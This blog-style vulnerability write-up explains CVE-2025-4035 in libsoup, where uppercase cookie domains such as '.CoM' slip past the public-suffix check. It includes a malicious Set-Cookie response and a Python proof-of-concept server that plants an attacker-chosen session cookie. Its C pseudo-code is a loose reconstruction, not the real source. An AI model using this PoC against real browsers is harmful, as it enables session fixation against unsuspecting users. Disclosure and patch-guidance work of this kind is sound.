CVE-2025-4035 - Libsoup Cookie Vulnerability Explained—with Exploit Example

A newly-disclosed security flaw, CVE-2025-4035, impacts the popular HTTP library libsoup. The bug lets attackers bypass cookie protection for public suffix domains (think: .com, .org) by slipping in uppercase letters, giving them the power to set cookies for domains they don’t own. This can mess up user sessions—potentially leading to serious issues like session fixation.

In this post, I’ll break down what’s happening, walk you through a code sample, and show an exploit example. This analysis uses simple terms, avoids fluff, and is crafted to be your exclusive, go-to resource.

What Is libsoup?

Libsoup is a C HTTP client/server library popular in Linux software (for example, GNOME apps and WebKitGTK browsers). It's responsible for sending/receiving HTTP requests, including handling cookies and security stuff.

Understanding the Flaw

Normally, browsers and HTTP libraries stop cookies from being set for public suffixes (like com, co.uk) because that would let anyone on the internet mess with everyone else’s cookies. Libsoup tries to check this via publicsuffix lists.

But: CVE-2025-4035 reveals libsoup’s check can be tricked. If a domain includes uppercase letters (for example, "Bank.COM" or "ExAMPle.net"), and has two components (“.com” or “.uk”), libsoup’s check fails and lets the cookie slip through—even if it shouldn’t. Since domain names are case-insensitive, this is a big problem.

A malicious website could then set a session cookie for .GoV or .PayPal.COM, impacting integrity and allowing attacks such as session fixation (forcing a victim to use an attacker-chosen session).

Simple Exploit Demo

Let’s look at example code (Python with http.server) that mimics how a web app might send a cookie for .COM to a libsoup-based client—bypassing protections using uppercase.

1. Here’s a Malicious HTTP Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: SessionId=attacker123; Domain=.CoM; Path=/; Secure

Here’s a simplified C pseudo-code representing libsoup's cookie logic

// The vulnerable code (simplified)
if (num_domain_components >= 2 && domain_has_uppercase(domain)) {
    // Public suffix check is bypassed!
    allow_cookie();
} else {
    if (is_public_suffix(domain))
        reject_cookie();
    else
        allow_cookie();
}

Any domain like .CoM or .OrG with uppercase slips through!

3. Proof of Concept (PoC)

You can test this by serving a response with a Set-Cookie header for .CoM from your server, then loading it in a GNOME Web or WebKitGTK browser (that uses libsoup) and watching cookies get set for the whole .com TLD.

Example: Python PoC Server

from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Set-Cookie', 'SessionId=attacker123; Domain=.CoM; Path=/')
        self.end_headers()
        self.wfile.write(b'Exploit sent!')

HTTPServer(('...', 8081), Handler).serve_forever()

Run this server, then visit in Epiphany (GNOME Web). If the flawed libsoup is present, you'll find a cookie for .com in your browser storage.

Impact

- Session Fixation Attacks: Attacker sets a cookie your legitimate site then honors, leading to session hijacking.

Cross-app Cookie Leaks: Cookies for entire TLDs risk being consumed by different origins.

- Loss of Integrity: Attackers can set, overwrite, or potential steal sensitive cookies that don’t belong to them.

Fix & Mitigation

Upstream Patch:
The libsoup maintainers issued a fix that makes the public suffix check *case-insensitive* and blocks these malformed cookies.

- Update your system: Make sure to use libsoup 2.74.5 or later (or your distro’s fixed version).
- Web developers: Don’t trust incoming cookies blindly, and set proper cookie flags like HttpOnly and SameSite.

References

- CVE-2025-4035 | NVD entry
- Upstream Commit Fix
- Libsoup Official Site
- Public Suffix List Explanation

TL;DR

CVE-2025-4035 allows bypassing public suffix protections in libsoup by using uppercase letters in cookie domains, enabling attackers to set dangerous cookies.
Update immediately, and watch for similar logic bugs in other HTTP libraries.


*This is an exclusive breakdown. Share responsibly—patch ASAP!*

Timeline

Published on: 04/29/2025 13:15:45 UTC
Last modified on: 04/29/2025 13:52:10 UTC